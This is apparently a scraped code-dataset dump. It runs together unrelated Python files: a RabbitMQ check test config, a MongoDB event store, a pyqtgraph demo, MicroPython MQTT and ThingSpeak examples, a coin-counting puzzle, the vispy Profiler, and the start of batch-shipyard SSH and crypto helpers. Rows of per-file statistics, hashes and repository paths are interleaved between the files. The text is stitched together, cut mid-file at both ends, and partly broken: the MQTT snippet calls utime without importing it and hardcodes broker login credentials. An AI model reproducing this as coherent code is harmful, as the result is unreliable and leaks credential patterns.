# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
from packaging import version
from datadog_checks.base.utils.common import get_docker_hostname
# Directory of this test file and the repository root above it.
HERE = os.path.dirname(os.path.abspath(__file__))
ROOT = os.path.dirname(os.path.dirname(HERE))

# os.environ[...] (not .get) deliberately raises KeyError when
# RABBITMQ_VERSION is not set.
RABBITMQ_VERSION_RAW = os.environ['RABBITMQ_VERSION']
RABBITMQ_VERSION = version.parse(RABBITMQ_VERSION_RAW)

CHECK_NAME = 'rabbitmq'
HOST = get_docker_hostname()
PORT = 15672
URL = 'http://{}:{}/api/'.format(HOST, PORT)

# Baseline check configuration: monitor queue/exchange "test1".
CONFIG = {
    'rabbitmq_api_url': URL,
    'rabbitmq_user': 'guest',
    'rabbitmq_pass': 'guest',
    'queues': ['test1'],
    'tags': ["tag1:1", "tag2"],
    'exchanges': ['test1'],
}

# Same as CONFIG but with node metric collection disabled.
CONFIG_NO_NODES = {
    'rabbitmq_api_url': URL,
    'rabbitmq_user': 'guest',
    'rabbitmq_pass': 'guest',
    'queues': ['test1'],
    'tags': ["tag1:1", "tag2"],
    'exchanges': ['test1'],
    'collect_node_metrics': False,
}

# Select queues/exchanges by regex instead of exact names.
CONFIG_REGEX = {
    'rabbitmq_api_url': URL,
    'rabbitmq_user': 'guest',
    'rabbitmq_pass': 'guest',
    'queues_regexes': [r'test\d+'],
    'exchanges_regexes': [r'test\d+'],
}

# Restrict monitoring to explicit vhosts.
CONFIG_VHOSTS = {
    'rabbitmq_api_url': URL,
    'rabbitmq_user': 'guest',
    'rabbitmq_pass': 'guest',
    'vhosts': ['/', 'myvhost'],
}

# Regexes with a capture group, tagged per family.
CONFIG_WITH_FAMILY = {
    'rabbitmq_api_url': URL,
    'rabbitmq_user': 'guest',
    'rabbitmq_pass': 'guest',
    'tag_families': True,
    'queues_regexes': [r'(test)\d+'],
    'exchanges_regexes': [r'(test)\d+'],
}

CONFIG_DEFAULT_VHOSTS = {
    'rabbitmq_api_url': URL,
    'rabbitmq_user': 'guest',
    'rabbitmq_pass': 'guest',
    'vhosts': ['/', 'test'],
}

CONFIG_TEST_VHOSTS = {
    'rabbitmq_api_url': URL,
    'rabbitmq_user': 'guest',
    'rabbitmq_pass': 'guest',
    'vhosts': ['test', 'test2'],
}

# Fixture: expected exchange message-stat fields (all rates included).
EXCHANGE_MESSAGE_STATS = {
    'ack': 1.0,
    'ack_details': {'rate': 1.0},
    'confirm': 1.0,
    'confirm_details': {'rate': 1.0},
    'deliver_get': 1.0,
    'deliver_get_details': {'rate': 1.0},
    'publish': 1.0,
    'publish_details': {'rate': 1.0},
    'publish_in': 1.0,
    'publish_in_details': {'rate': 1.0},
    'publish_out': 1.0,
    'publish_out_details': {'rate': 1.0},
    'return_unroutable': 1.0,
    'return_unroutable_details': {'rate': 1.0},
    'redeliver': 1.0,
    'redeliver_details': {'rate': 1.0},
}
| 23.606061
| 64
| 0.618314
| 291
| 2,337
| 4.694158
| 0.323024
| 0.023426
| 0.070278
| 0.076135
| 0.489751
| 0.418009
| 0.418009
| 0.418009
| 0.418009
| 0.418009
| 0
| 0.027749
| 0.182713
| 2,337
| 98
| 65
| 23.846939
| 0.687435
| 0.046213
| 0
| 0.341772
| 0
| 0
| 0.402247
| 0.011236
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.088608
| 0.037975
| 0
| 0.037975
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6acc395ad3bfafbc612c2d532d32bbb5ce80e13f
| 4,123
|
py
|
Python
|
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
lisy09/flink-ai-extended
|
011a5a332f7641f66086653e715d0596eab2e107
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1
|
2021-08-06T04:24:36.000Z
|
2021-08-06T04:24:36.000Z
|
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
sentimentist/flink-ai-extended
|
689d000f2db8919fd80e0725a1609918ca4a26f4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
sentimentist/flink-ai-extended
|
689d000f2db8919fd80e0725a1609918ca4a26f4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1
|
2021-05-20T02:17:11.000Z
|
2021-05-20T02:17:11.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import time
import socket
# BUG FIX: `Iterable` lives in `collections.abc`; importing it from
# `collections` was deprecated since Python 3.3 and removed in 3.10.
from collections.abc import Iterable
from typing import Union, Tuple

from mongoengine import connect

from notification_service.event_storage import BaseEventStorage
from notification_service.base_notification import BaseEvent
from notification_service.mongo_notification import MongoEvent
class MongoEventStorage(BaseEventStorage):
    """Event storage backed by MongoDB via mongoengine."""

    def __init__(self, *args, **kwargs):
        # Keyword arguments are forwarded to setup_connection;
        # positional args are accepted but unused.
        self.db_conn = self.setup_connection(**kwargs)
        # This host's IP, recorded on every stored event as server_ip.
        self.server_ip = socket.gethostbyname(socket.gethostname())

    def setup_connection(self, **kwargs):
        """Open the MongoDB connection.

        Expects ``host``, ``port`` and ``db`` keyword arguments;
        optional ``username``/``password`` (both or neither) and
        ``authentication_source`` (defaults to "admin").
        """
        db_conf = {
            "host": kwargs.get("host"),
            "port": kwargs.get("port"),
            "db": kwargs.get("db"),
        }
        username = kwargs.get("username", None)
        password = kwargs.get("password", None)
        authentication_source = kwargs.get("authentication_source", "admin")
        # Credentials must be supplied as a pair or not at all.
        if (username or password) and not (username and password):
            raise Exception("Please provide valid username and password")
        if username and password:
            db_conf.update({
                "username": username,
                "password": password,
                "authentication_source": authentication_source
            })
        return connect(**db_conf)

    def get_latest_version(self, key: str, namespace: str = None):
        # Fetch the single newest event for `key` (sorted by "-version");
        # return 0 when no event exists yet.
        # NOTE(review): `namespace` is accepted but not used here --
        # confirm whether filtering by namespace was intended.
        mongo_events = MongoEvent.get_by_key(key, 0, 1, "-version")
        if not mongo_events:
            return 0
        return mongo_events[0].version

    def add_event(self, event: BaseEvent, uuid: str):
        """Persist *event* and return it with the stored
        ``create_time`` and ``version`` filled in."""
        kwargs = {
            "server_ip": self.server_ip,
            "create_time": int(time.time() * 1000),  # epoch milliseconds
            "event_type": event.event_type,
            "key": event.key,
            "value": event.value,
            "context": event.context,
            "namespace": event.namespace,
            "sender": event.sender,
            "uuid": uuid
        }
        mongo_event = MongoEvent(**kwargs)
        mongo_event.save()
        # Re-read the saved document so create_time/version reflect the
        # values actually stored.
        mongo_event.reload()
        event.create_time = mongo_event.create_time
        event.version = mongo_event.version
        return event

    def list_events(self,
                    key: Union[str, Tuple[str]],
                    version: int = None,
                    event_type: str = None,
                    start_time: int = None,
                    namespace: str = None,
                    sender: str = None):
        """Query events; empty-string (or zero version) arguments are
        normalized to ``None`` meaning "no filter"."""
        key = None if key == "" else key
        version = None if version == 0 else version
        event_type = None if event_type == "" else event_type
        namespace = None if namespace == "" else namespace
        sender = None if sender == "" else sender
        # Normalize key to a tuple of keys.
        if isinstance(key, str):
            key = (key,)
        elif isinstance(key, Iterable):
            key = tuple(key)
        res = MongoEvent.get_base_events(key, version, event_type, start_time, namespace, sender)
        return res

    def list_all_events(self, start_time: int):
        """List events filtered by *start_time* (delegates to
        MongoEvent.get_base_events_by_time)."""
        res = MongoEvent.get_base_events_by_time(start_time)
        return res

    def list_all_events_from_version(self, start_version: int, end_version: int = None):
        """List events filtered by version range (delegates to
        MongoEvent.get_base_events_by_version)."""
        res = MongoEvent.get_base_events_by_version(start_version, end_version)
        return res

    def clean_up(self):
        """Delete the events recorded under this server's IP."""
        MongoEvent.delete_by_client(self.server_ip)
| 38.175926
| 97
| 0.64031
| 494
| 4,123
| 5.192308
| 0.311741
| 0.024561
| 0.026901
| 0.023392
| 0.051462
| 0.041326
| 0
| 0
| 0
| 0
| 0
| 0.004329
| 0.271647
| 4,123
| 107
| 98
| 38.53271
| 0.849817
| 0.182391
| 0
| 0.037975
| 0
| 0
| 0.063544
| 0.01253
| 0
| 0
| 0
| 0
| 0
| 1
| 0.101266
| false
| 0.063291
| 0.101266
| 0
| 0.303797
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a77fdb1c15169709a632c8652ce9cffd62abd68
| 491
|
py
|
Python
|
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | 5
|
2020-05-19T07:32:39.000Z
|
2022-03-14T09:09:48.000Z
|
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | null | null | null |
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | 3
|
2020-04-02T08:30:17.000Z
|
2020-05-03T12:12:05.000Z
|
# !/usr/bin/env python3
# -*- coding:utf-8 -*-
# @Datetime : 2019/11/14 上午2:26
# @Author : Fangyang
# @Software : PyCharm
import sys

from PyQt5.QtWidgets import QApplication
import pyqtgraph as pg
import numpy as np

# The Qt application object must exist before any widgets are created.
app = QApplication(sys.argv)

# 1000 x samples and three rows of normally distributed y samples.
x = np.arange(1000)
y = np.random.normal(size=(3, 1000))

plotWidget = pg.plot(title='Three plot curves')
for i in range(3):
    # pen=(i, 3): presumably selects the i-th of 3 auto-assigned pen
    # colors -- confirm against pyqtgraph's mkPen docs.
    plotWidget.plot(x, y[i], pen=(i, 3))

# Enter the Qt event loop; exec_() blocks until the window is closed.
status = app.exec_()
sys.exit(status)

# Unreachable after sys.exit(); kept from the original source.
if __name__ == '__main__':
    pass
| 19.64
| 47
| 0.678208
| 77
| 491
| 4.207792
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060976
| 0.164969
| 491
| 24
| 48
| 20.458333
| 0.729268
| 0.230143
| 0
| 0
| 0
| 0
| 0.067204
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.071429
| 0.285714
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a99a93e656914b21bfd27861c1447d786a91bee
| 2,929
|
py
|
Python
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 838
|
2017-07-14T10:08:13.000Z
|
2022-03-22T22:09:14.000Z
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 395
|
2017-08-18T15:56:17.000Z
|
2022-03-20T11:28:23.000Z
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 349
|
2017-09-02T18:00:23.000Z
|
2022-03-31T23:26:22.000Z
|
import network
def conncb(task):
    """MQTT callback: report that *task* connected."""
    msg = "[{}] Connected".format(task)
    print(msg)
def disconncb(task):
    """MQTT callback: report that *task* disconnected."""
    msg = "[{}] Disconnected".format(task)
    print(msg)
def subscb(task):
    """MQTT callback: report a completed subscription for *task*."""
    msg = "[{}] Subscribed".format(task)
    print(msg)
def pubcb(pub):
    """MQTT callback: report a published message (pub = (task, payload))."""
    msg = "[{}] Published: {}".format(pub[0], pub[1])
    print(msg)
def datacb(msg):
    """MQTT callback: print topic and payload of an incoming message
    (msg = (task, topic, payload))."""
    header = "[{}] Data arrived from topic: {}, Message:\n".format(msg[0], msg[1])
    print(header, msg[2])
# Create the MQTT client with all lifecycle callbacks wired up.
mqtt = network.mqtt("loboris", "mqtt://loboris.eu", user="wifimcu", password="wifimculobo", cleansession=True, connected_cb=conncb, disconnected_cb=disconncb, subscribed_cb=subscb, published_cb=pubcb, data_cb=datacb)

# secure connection requires more memory and may not work
# mqtts = network.mqtt("eclipse", "mqtts//iot.eclipse.org", cleansession=True, connected_cb=conncb, disconnected_cb=disconncb, subscribed_cb=subscb, published_cb=pubcb, data_cb=datacb)
# wsmqtt = network.mqtt("eclipse", "ws://iot.eclipse.org:80/ws", cleansession=True, data_cb=datacb)

mqtt.start()

#mqtt.config(lwt_topic='status', lwt_msg='Disconected')

# Commented-out usage example (kept as a string literal in the module):
'''
# Wait until status is: (1, 'Connected')
mqtt.subscribe('test')
mqtt.publish('test', 'Hi from Micropython')
mqtt.stop()
'''
import network
def datacb(msg):
    """MQTT callback (redefinition for the ThingSpeak example): print
    topic and payload of an incoming message."""
    header = "[{}] Data arrived from topic: {}, Message:\n".format(msg[0], msg[1])
    print(header, msg[2])
# ThingSpeak MQTT client.
thing = network.mqtt("thingspeak", "mqtt://mqtt.thingspeak.com", user="anyName", password="ThingSpeakMQTTid", cleansession=True, data_cb=datacb)
# or secure connection
#thing = network.mqtt("thingspeak", "mqtts://mqtt.thingspeak.com", user="anyName", password="ThingSpeakMQTTid", cleansession=True, data_cb=datacb)

thingspeakChannelId = "123456"  # enter Thingspeak Channel ID
thingspeakChannelWriteApiKey = "ThingspeakWriteAPIKey"  # EDIT - enter Thingspeak Write API Key
thingspeakFieldNo = 1
thingSpeakChanelFormat = "json"

# ThingSpeak topic strings for publishing/subscribing to the whole
# channel and to a single field.
pubchan = "channels/{:s}/publish/{:s}".format(thingspeakChannelId, thingspeakChannelWriteApiKey)
pubfield = "channels/{:s}/publish/fields/field{}/{:s}".format(thingspeakChannelId, thingspeakFieldNo, thingspeakChannelWriteApiKey)
subchan = "channels/{:s}/subscribe/{:s}/{:s}".format(thingspeakChannelId, thingSpeakChanelFormat, thingspeakChannelWriteApiKey)
subfield = "channels/{:s}/subscribe/fields/field{}/{:s}".format(thingspeakChannelId, thingspeakFieldNo, thingspeakChannelWriteApiKey)

thing.start()

# Poll (up to ~8 s) until the client reports status 2 -- presumably
# "connected"; confirm against the network.mqtt documentation.
# NOTE(review): `utime` is used below but never imported in this file
# -- confirm it is in scope (MicroPython normally requires `import utime`).
tmo = 0
while thing.status()[0] != 2:
    utime.sleep_ms(100)
    tmo += 1
    if tmo > 80:
        print("Not connected")
        break

# subscribe to channel
thing.subscribe(subchan)
# subscribe to field
thing.subscribe(subfield)

# publish to channel
# Payload can include any of those fields separated by ';':
# "field1=value;field2=value;...;field8=value;latitude=value;longitude=value;elevation=value;status=value"
thing.publish(pubchan, "field1=25.2;status=On line")
# Publish to field
thing.publish(pubfield, "24.5")
| 33.284091
| 216
| 0.712188
| 347
| 2,929
| 5.965418
| 0.357349
| 0.02657
| 0.028986
| 0.031884
| 0.329469
| 0.315942
| 0.315942
| 0.236715
| 0.236715
| 0.236715
| 0
| 0.01428
| 0.115398
| 2,929
| 87
| 217
| 33.666667
| 0.784639
| 0.313418
| 0
| 0.162162
| 0
| 0
| 0.252552
| 0.11338
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162162
| false
| 0.054054
| 0.054054
| 0
| 0.216216
| 0.189189
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a9deb518dd12c6a3961ce613b76fcc3db2acd68
| 602
|
py
|
Python
|
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
class TaskA:
    """Problem A: reads the input line; solution not implemented."""

    def run(self):
        # Consume the single "V A B C" input line so stdin stays in sync.
        V, A, B, C = (int(token) for token in input().split())
class TaskB:
    """Count ways to pick 500/100/50-yen coins totalling exactly X yen."""

    def run(self):
        # Input: available coin counts A (500s), B (100s), C (50s), target X.
        coins_500 = int(input())
        coins_100 = int(input())
        coins_50 = int(input())
        target = int(input())
        # Exhaustively enumerate all selections and count exact matches.
        matches = sum(
            1
            for a in range(coins_500 + 1)
            for b in range(coins_100 + 1)
            for c in range(coins_50 + 1)
            if 500 * a + 100 * b + 50 * c == target
        )
        print(matches)
class TaskC:
    """Problem C placeholder; no solution implemented."""

    def run(self):
        # Intentionally a no-op.
        pass
if __name__ == "__main__":
    # Select and execute the task for this submission.
    TaskB().run()
| 21.5
| 54
| 0.413621
| 78
| 602
| 3.089744
| 0.410256
| 0.165975
| 0.124481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039394
| 0.451827
| 602
| 28
| 55
| 21.5
| 0.690909
| 0
| 0
| 0.208333
| 0
| 0
| 0.013267
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0.083333
| 0
| 0
| 0.25
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0ab9be78769ca53a9456cd93a3fd3ab2a85a0c35
| 4,799
|
py
|
Python
|
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Adapted from PyQtGraph
import sys
from . import ptime
from .. import config
class Profiler(object):
    """Simple profiler allowing directed, hierarchical measurement of time
    intervals.
    By default, profilers are disabled. To enable profiling, set the
    environment variable `VISPYPROFILE` to a comma-separated list of
    fully-qualified names of profiled functions.
    Calling a profiler registers a message (defaulting to an increasing
    counter) that contains the time elapsed since the last call. When the
    profiler is about to be garbage-collected, the messages are passed to the
    outer profiler if one is running, or printed to stdout otherwise.
    If `delayed` is set to False, messages are immediately printed instead.
    Example:
        def function(...):
            profiler = Profiler()
            ... do stuff ...
            profiler('did stuff')
            ... do other stuff ...
            profiler('did other stuff')
            # profiler is garbage-collected and flushed at function end
    If this function is a method of class C, setting `VISPYPROFILE` to
    "C.function" (without the module name) will enable this profiler.
    For regular functions, use the qualified name of the function, stripping
    only the initial "vispy.." prefix from the module.
    """
    # Names for which profiling is enabled, parsed from config['profile'].
    _profilers = (config['profile'].split(",") if config['profile'] is not None
                  else [])
    _depth = 0   # nesting depth of live profilers (shared class-wide)
    _msgs = []   # buffered (format-string, args) pairs awaiting flush
    # set this flag to disable all or individual profilers at runtime
    disable = False

    class DisabledProfiler(object):
        # Inert stand-in returned when profiling is off; every API is a no-op
        # so call sites never need conditional logic.
        def __init__(self, *args, **kwds):
            pass

        def __call__(self, *args):
            pass

        def finish(self):
            pass

        def mark(self, msg=None):
            pass
    _disabled_profiler = DisabledProfiler()

    def __new__(cls, msg=None, disabled='env', delayed=True):
        """Optionally create a new profiler based on caller's qualname.
        """
        # Fast path: profiling globally off (or explicitly disabled) hands
        # back the shared no-op instead of allocating a real profiler.
        if (disabled is True or
                (disabled == 'env' and len(cls._profilers) == 0)):
            return cls._disabled_profiler
        # determine the qualified name of the caller function
        caller_frame = sys._getframe(1)
        try:
            caller_object_type = type(caller_frame.f_locals["self"])
        except KeyError:  # we are in a regular function
            qualifier = caller_frame.f_globals["__name__"].split(".", 1)[1]
        else:  # we are in a method
            qualifier = caller_object_type.__name__
        func_qualname = qualifier + "." + caller_frame.f_code.co_name
        if (disabled == 'env' and func_qualname not in cls._profilers and
                'all' not in cls._profilers):  # don't do anything
            return cls._disabled_profiler
        # create an actual profiling object
        cls._depth += 1
        obj = super(Profiler, cls).__new__(cls)
        obj._name = msg or func_qualname
        obj._delayed = delayed
        obj._mark_count = 0
        obj._finished = False
        obj._firstTime = obj._last_time = ptime.time()
        obj._new_msg("> Entering " + obj._name)
        return obj

    def __call__(self, msg=None, *args):
        """Register or print a new message with timing information.
        """
        if self.disable:
            return
        if msg is None:
            # default message: an incrementing per-profiler counter
            msg = str(self._mark_count)
        self._mark_count += 1
        new_time = ptime.time()
        # elapsed milliseconds since the previous mark (or profiler creation)
        elapsed = (new_time - self._last_time) * 1000
        self._new_msg(" " + msg + ": %0.4f ms", *(args + (elapsed,)))
        self._last_time = new_time

    def mark(self, msg=None):
        # Alias for calling the profiler object directly.
        self(msg)

    def _new_msg(self, msg, *args):
        # Indent by nesting depth; buffer when delayed, print immediately
        # (after flushing anything pending) otherwise.
        msg = " " * (self._depth - 1) + msg
        if self._delayed:
            self._msgs.append((msg, args))
        else:
            self.flush()
            print(msg % args)

    def __del__(self):
        # Garbage collection of the profiler triggers the final flush.
        self.finish()

    def finish(self, msg=None):
        """Add a final message; flush the message list if no parent profiler.
        """
        # Idempotent: only the first finish() (or __del__) takes effect.
        if self._finished or self.disable:
            return
        self._finished = True
        if msg is not None:
            self(msg)
        self._new_msg("< Exiting %s, total time: %0.4f ms",
                      self._name, (ptime.time() - self._firstTime) * 1000)
        type(self)._depth -= 1
        if self._depth < 1:
            # outermost profiler exited: emit everything that was buffered
            self.flush()

    def flush(self):
        # Print and clear the shared message buffer.
        if self._msgs:
            print("\n".join([m[0] % m[1] for m in self._msgs]))
            type(self)._msgs = []
| 34.52518
| 79
| 0.583663
| 587
| 4,799
| 4.599659
| 0.337308
| 0.018148
| 0.016296
| 0.013333
| 0.028889
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0092
| 0.320483
| 4,799
| 138
| 80
| 34.775362
| 0.818767
| 0.356324
| 0
| 0.202532
| 0
| 0
| 0.034343
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.139241
| false
| 0.050633
| 0.037975
| 0
| 0.329114
| 0.025316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0ac98e5cdb6676a542021f48c116aa5fa733e705
| 16,208
|
py
|
Python
|
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation
#
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# compat imports
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from builtins import ( # noqa
bytes, dict, int, list, object, range, str, ascii, chr, hex, input,
next, oct, open, pow, round, super, filter, map, zip)
# stdlib imports
import base64
import collections
import getpass
import logging
import os
try:
import pathlib2 as pathlib
except ImportError:
import pathlib
import tempfile
import stat
import subprocess
# local imports
from . import settings
from . import util
# create logger
logger = logging.getLogger(__name__)
util.setup_logger(logger)
# global defines
# Filename prefix for generated SSH key pairs.
_SSH_KEY_PREFIX = 'id_rsa_shipyard'
# Prefix for SSH keys dedicated to remote-filesystem access.
_REMOTEFS_SSH_KEY_PREFIX = '{}_remotefs'.format(_SSH_KEY_PREFIX)
# named tuples
# Bundle of PFX certificate settings: file path, passphrase, SHA1 thumbprint.
PfxSettings = collections.namedtuple(
    'PfxSettings', ['filename', 'passphrase', 'sha1'])
def get_ssh_key_prefix():
    # type: (None) -> str
    """Return the filename prefix used for generated SSH key pairs.
    :rtype: str
    :return: ssh key prefix
    """
    return _SSH_KEY_PREFIX
def get_remotefs_ssh_key_prefix():
    # type: (None) -> str
    """Return the filename prefix for remote-fs SSH key pairs.
    :rtype: str
    :return: ssh key prefix for remote fs
    """
    return _REMOTEFS_SSH_KEY_PREFIX
def generate_rdp_password():
    # type: (None) -> str
    """Generate a random RDP password.
    Base64-encodes 8 bytes of CSPRNG output, yielding a 12-character
    ASCII password.
    :rtype: str
    :return: rdp password
    """
    # FIX: base64.b64encode returns bytes on Python 3; decode so callers
    # receive the documented str instead of a bytes object.
    return base64.b64encode(os.urandom(8)).decode('ascii')
def generate_ssh_keypair(export_path, prefix=None):
    # type: (str, str) -> tuple
    """Generate an ssh keypair for use with user logins.
    Existing keys with the same name are rotated to ``.old`` backups first.
    :param str export_path: keypair export path
    :param str prefix: key prefix; defaults to the module SSH key prefix
    :rtype: tuple
    :return: (private key filename, public key filename)
    """
    if util.is_none_or_empty(prefix):
        prefix = _SSH_KEY_PREFIX
    private_key = pathlib.Path(export_path, prefix)
    public_key = pathlib.Path(export_path, prefix + '.pub')

    def _rotate(path, old_suffix):
        # move an existing key out of the way, replacing any prior backup
        if path.exists():
            backup = pathlib.Path(export_path, prefix + old_suffix)
            if backup.exists():
                backup.unlink()
            path.rename(backup)

    _rotate(private_key, '.old')
    _rotate(public_key, '.pub.old')
    logger.info('generating ssh key pair to path: {}'.format(export_path))
    # unencrypted RSA key (-N '' sets an empty passphrase)
    subprocess.check_call(
        ['ssh-keygen', '-f', str(private_key), '-t', 'rsa', '-N', ''])
    return (private_key, public_key)
def check_ssh_private_key_filemode(ssh_private_key):
    # type: (pathlib.Path) -> bool
    """Check that an SSH private key is not group/other accessible.
    :param pathlib.Path ssh_private_key: SSH private key
    :rtype: bool
    :return: private key filemode is ok
    """
    # Windows has no POSIX permission bits to inspect.
    if util.on_windows():
        return True
    mode = ssh_private_key.stat().st_mode
    # reject the key if any group or other permission bit is set
    return not bool(mode & (stat.S_IRWXG | stat.S_IRWXO))
def connect_or_exec_ssh_command(
        remote_ip, remote_port, ssh_private_key, username, sync=True,
        shell=False, tty=False, ssh_args=None, command=None):
    # type: (str, int, pathlib.Path, str, bool, bool, tuple, tuple) -> bool
    """Connect to node via SSH or execute SSH command.
    Builds and runs an ``ssh`` command line; interactive connect when
    `command` is empty, remote command execution otherwise.
    :param str remote_ip: remote ip address
    :param int remote_port: remote port
    :param pathlib.Path ssh_private_key: SSH private key
    :param str username: username
